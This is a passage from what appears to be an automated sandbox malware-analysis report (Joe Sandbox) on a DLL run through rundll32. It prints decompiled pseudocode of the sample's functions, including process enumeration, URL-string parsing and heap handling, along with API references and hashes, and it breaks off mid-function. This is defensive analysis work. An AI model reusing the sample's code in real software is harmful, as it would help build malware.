                                          0x06776b60
                                          0x06776b6b

                                          APIs
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                            • Part of subcall function 06779038: wsprintfA.USER32 ref: 06779094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,06772098,74666F53,00000000,?,0677D00C,?,?), ref: 06776B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 06776B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 06776B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: fc5a7121441ed9c682893a8faa7513d47b5709e7ddb721924757f23ff534ea79
                                          • Instruction ID: 1910adf59ad652461bf0c269a1d03ba7aebb2696379a956781cc673d6b3b62e9
                                          • Opcode Fuzzy Hash: fc5a7121441ed9c682893a8faa7513d47b5709e7ddb721924757f23ff534ea79
                                          • Instruction Fuzzy Hash: 7F012672600606BBDF922BA88C88EFF3B6DDF86245F144025FB1096108DB34C905C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067756A2, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E067756A2() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x677d2a4; // 0x4ca5a8
						_t2 = _t9 + 0x677ee38; // 0x73617661
						_push( &_v264);
						if( *0x677d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                          0x067756ad
                                          0x067756b7
                                          0x067756bb
                                          0x067756c5
                                          0x067756f6
                                          0x067756cc
                                          0x067756d1
                                          0x067756de
                                          0x067756e7
                                          0x067756fe
                                          0x067756e9
                                          0x067756f1
                                          0x00000000
                                          0x067756f1
                                          0x067756ff
                                          0x06775700
                                          0x00000000
                                          0x06775700
                                          0x00000000
                                          0x067756fa
                                          0x06775706
                                          0x0677570b

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 067756B2
                                          • Process32First.KERNEL32(00000000,?), ref: 067756C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 067756F1
                                          • CloseHandle.KERNEL32(00000000), ref: 06775700
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: a6e6fe0547bfbae34e2957aa72c8f2a1328d75f41f3c52007dcf260cfe9e78d7
                                          • Instruction ID: 0669a61ce916ac8e99dac3ce6404354acbc0d00717f732450ccedd4eb5bb01a2
                                          • Opcode Fuzzy Hash: a6e6fe0547bfbae34e2957aa72c8f2a1328d75f41f3c52007dcf260cfe9e78d7
                                          • Instruction Fuzzy Hash: 59F09672A011655AFBA0A7369C48DEB76ADDFC5614F004051EA15D6040FA60DA46C6E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06777283, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E06777283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x0677728d
                                          0x06777291
                                          0x067772a6
                                          0x067772a8
                                          0x067772ad
                                          0x067772b3
                                          0x067772b5
                                          0x067772ba
                                          0x067772c5
                                          0x067772bc
                                          0x067772bc
                                          0x067772bc
                                          0x067772ba
                                          0x067772d3

                                          APIs
                                          • memset.NTDLL ref: 06777291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 067772A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 067772B3
                                          • CloseHandle.KERNEL32(?), ref: 067772C5
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 2099c79cdf1394d1dc3c5e12e207b6cf178a4744504c4dc8d31b46a14f6213ee
                                          • Instruction ID: 9ecde4e2c831e598ce3c0985c0a5f1a9cd72a70cde8c634291c26248b5697403
                                          • Opcode Fuzzy Hash: 2099c79cdf1394d1dc3c5e12e207b6cf178a4744504c4dc8d31b46a14f6213ee
                                          • Instruction Fuzzy Hash: 88F012F160430CBFD754AF66DCC4C27FBEDFB561A8B118D2EF15292511D672A8058AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0677A2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E0677A2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E067758BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                          0x0677a2f2
                                          0x0677a2f6
                                          0x0677a2f8
                                          0x0677a2fe
                                          0x0677a302
                                          0x0677a304
                                          0x0677a304
                                          0x0677a306
                                          0x0677a30f
                                          0x0677a313
                                          0x0677a31b
                                          0x0677a32a
                                          0x0677a32f
                                          0x0677a337

                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,06779AA8,00000000,00000005,0677D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 0677A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 0677A31B
                                          • memset.NTDLL ref: 0677A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 8670ce4207e478c3a94cbffda1e3fd1a82724808aba316c7df5ea9085b5a63c8
                                          • Instruction ID: 652f4ae82e2333af8b75fe878774b8333d3db0c501f437a34e971ae8af149c3b
                                          • Opcode Fuzzy Hash: 8670ce4207e478c3a94cbffda1e3fd1a82724808aba316c7df5ea9085b5a63c8
                                          • Instruction Fuzzy Hash: B4E0E5B3A052116BDA70AAB85C8CD4F2A9DDBD8260B000435FA15C3204E630CC04C6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06774C3A, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E06774C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x677d324; // 0x6c495b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x677d324; // 0x6c495b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x677d030) {
					HeapFree( *0x677d238, 0, _t8);
				}
				_t14[1] = E06777C75(_v0, _t14);
				_t11 =  *0x677d324; // 0x6c495b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                          0x06774c3a
                                          0x06774c3a
                                          0x06774c43
                                          0x06774c53
                                          0x06774c53
                                          0x06774c58
                                          0x06774c5d
                                          0x00000000
                                          0x00000000
                                          0x06774c4d
                                          0x06774c4d
                                          0x06774c5f
                                          0x06774c63
                                          0x06774c75
                                          0x06774c75
                                          0x06774c85
                                          0x06774c88
                                          0x06774c8d
                                          0x06774c91
                                          0x06774c97

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06C49570), ref: 06774C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 06774C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 06774C75
                                          • RtlLeaveCriticalSection.NTDLL(06C49570), ref: 06774C91
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: cd37524cecd69a4e5906c9bbe0ae8bfeddb5aaadb78a2281c242c3b894343def
                                          • Instruction ID: 317cdc7b6bb66dd8430aa87a524584276364e6dd722b4501b0ff9fd3e80bbd36
                                          • Opcode Fuzzy Hash: cd37524cecd69a4e5906c9bbe0ae8bfeddb5aaadb78a2281c242c3b894343def
                                          • Instruction Fuzzy Hash: F0F012B0A10240DFEB65DF78DE48F2977EAAF28745B04C514F702D7258D720E845CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 067778AD, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E067778AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x677d26c; // 0x3d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x677d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x677d26c; // 0x3d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x677d238; // 0x6850000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x067778ad
                                          0x067778b4
                                          0x067778fe
                                          0x06777900
                                          0x06777900
                                          0x067778b8
                                          0x067778be
                                          0x067778c3
                                          0x067778c7
                                          0x067778cd
                                          0x067778d4
                                          0x00000000
                                          0x00000000
                                          0x067778d6
                                          0x067778db
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x067778db
                                          0x067778dd
                                          0x067778e5
                                          0x067778e8
                                          0x067778e8
                                          0x067778ee
                                          0x067778f5
                                          0x067778f8
                                          0x067778f8
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(000003D0,00000001,06776F2D), ref: 067778B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 067778C7
                                          • CloseHandle.KERNEL32(000003D0), ref: 067778E8
                                          • HeapDestroy.KERNEL32(06850000), ref: 067778F8
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: b22735beb9107aa645d27f51631457aeea0a6e4c23709c139d1d2ef7057552a1
                                          • Instruction ID: 48817e568294317869e35d0e85e737232c9c912b3d87e1b31024150329a06d14
                                          • Opcode Fuzzy Hash: b22735beb9107aa645d27f51631457aeea0a6e4c23709c139d1d2ef7057552a1
                                          • Instruction Fuzzy Hash: CCF065B1F113119BDF659B75DD48F167B9BAF09651B148511BE00D7288DF70C401D6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06779B10, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E06779B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x677d324; // 0x6c495b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x677d324; // 0x6c495b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x677d324; // 0x6c495b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x677e845) {
					HeapFree( *0x677d238, 0, _t10);
					_t7 =  *0x677d324; // 0x6c495b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x06779b10
                                          0x06779b19
                                          0x06779b29
                                          0x06779b29
                                          0x06779b2e
                                          0x06779b33
                                          0x00000000
                                          0x00000000
                                          0x06779b23
                                          0x06779b23
                                          0x06779b35
                                          0x06779b3a
                                          0x06779b3e
                                          0x06779b51
                                          0x06779b57
                                          0x06779b57
                                          0x06779b60
                                          0x06779b62
                                          0x06779b66
                                          0x06779b6c

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06C49570), ref: 06779B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 06779B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,06774A8B,?,?,?,4D283A53,?,?), ref: 06779B51
                                          • RtlLeaveCriticalSection.NTDLL(06C49570), ref: 06779B66
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 2a5471113ce629e62a11e4837c4605b01aa2f09fe27e5463e903328935c0ad5b
                                          • Instruction ID: 14055549a2cffcccbb4074f00df359468a75c3de151cbc9cc13935db87a7e71b
                                          • Opcode Fuzzy Hash: 2a5471113ce629e62a11e4837c4605b01aa2f09fe27e5463e903328935c0ad5b
                                          • Instruction Fuzzy Hash: 17F0D4B4A11200DFEB69CF64EE59E2937E6EF18300B048018EB02C7268D630BC40CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06776B6E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E06776B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E067758BE(_t2);
				if(_t34 != 0) {
					_t30 = E067758BE(_t28);
					if(_t30 == 0) {
						E0677147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0677A8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0677A8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x06776b6e
                                          0x06776b78
                                          0x06776b7a
                                          0x06776b80
                                          0x06776b80
                                          0x06776b89
                                          0x06776b8d
                                          0x06776b99
                                          0x06776b9d
                                          0x06776c11
                                          0x06776b9f
                                          0x06776b9f
                                          0x06776ba3
                                          0x06776ba8
                                          0x06776bad
                                          0x06776bc7
                                          0x06776bb6
                                          0x06776bb6
                                          0x06776bba
                                          0x06776bbd
                                          0x06776bc2
                                          0x06776bc2
                                          0x06776bcc
                                          0x06776bf4
                                          0x06776bfa
                                          0x06776bfd
                                          0x06776bce
                                          0x06776bd0
                                          0x06776bd8
                                          0x06776be3
                                          0x06776be8
                                          0x06776be8
                                          0x06776c04
                                          0x06776c0b
                                          0x06776c0c
                                          0x06776c0c
                                          0x06776b9d
                                          0x06776c1c

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0677A006,?,?,?,?,00000102,067766AF,?,?,00000000), ref: 06776B7A
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                            • Part of subcall function 0677A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,06776BA8,00000000,00000001,00000001,?,?,0677A006,?,?,?,?,00000102), ref: 0677A8E0
                                            • Part of subcall function 0677A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,0677A006,?,?,?,?,00000102,067766AF,?,?,00000000,00000000), ref: 0677A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0677A006,?,?,?,?,00000102,067766AF,?), ref: 06776BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 06776BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 06776BF4
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: ed3a30beb3c8c3da46313396c84f4df9fc6b03c555627b8fd6992c190a2f5f92
                                          • Instruction ID: 054026c23f8a31eca969d5baf76f2fbcc353ec73d906934af4c08c481dfa53f4
                                          • Opcode Fuzzy Hash: ed3a30beb3c8c3da46313396c84f4df9fc6b03c555627b8fd6992c190a2f5f92
                                          • Instruction Fuzzy Hash: 9921B1B2904655FFDF925FB4CD88AAE7FA9EF0A280B158154FA049B215DB31DA00C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06775FCB, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E06775FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E067758BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x06775fe0
                                          0x06775fe4
                                          0x06775fee
                                          0x06775ff3
                                          0x06775ff8
                                          0x06775ffa
                                          0x06776002
                                          0x06776007
                                          0x06776015
                                          0x0677601a
                                          0x06776024

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,06C4937C,?,0677694E,004F0053,06C4937C,?,?,?,?,?,?,06779C10), ref: 06775FDB
                                          • lstrlenW.KERNEL32(0677694E,?,0677694E,004F0053,06C4937C,?,?,?,?,?,?,06779C10), ref: 06775FE2
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0677694E,004F0053,06C4937C,?,?,?,?,?,?,06779C10), ref: 06776002
                                          • memcpy.NTDLL(751469A0,0677694E,00000002,00000000,004F0053,751469A0,?,?,0677694E,004F0053,06C4937C), ref: 06776015
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: 20405d42814908a05dbb776cef9455ef357c452eb58a439ea265dbde4a4a2a24
                                          • Instruction ID: 0d72699940d8d43931cab160f65caff279affaece02bfbc0b8ced8c0a1cbfbf0
                                          • Opcode Fuzzy Hash: 20405d42814908a05dbb776cef9455ef357c452eb58a439ea265dbde4a4a2a24
                                          • Instruction Fuzzy Hash: 47F04972900119BB8F51EFA8CC89CDF7BACEF092947054066EA04D7215EB31EA10DBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06779DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,06775335,616D692F,00000000), ref: 06779DFB
                                          • lstrlen.KERNEL32(?), ref: 06779E03
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 06779E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 06779E25
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 7c112e62901b311b6b287566cab67e07ea88fe7a5d11bb38b70da1de12cce771
                                          • Instruction ID: 62a59d0e9b6b26f3925658ad27cd2ed223eab20e4ad214b0aeaf92a2d2839790
                                          • Opcode Fuzzy Hash: 7c112e62901b311b6b287566cab67e07ea88fe7a5d11bb38b70da1de12cce771
                                          • Instruction Fuzzy Hash: C4E01273815621AF8B626BA4AC08C9FBBAAFF8D250705891AF750D3118CB31C815CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rundll32.exe PID: 7000 Parent PID: 2880 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 04FD32BA, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E04FD32BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x4fdd2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x4fdd238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x4fdd2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x4fdd238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x4fdd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x4fdd2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x4fdd2a4; // 0x254a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x4fde7e8; // 0x73797325
				_t83 = E04FD77E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x4fdd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
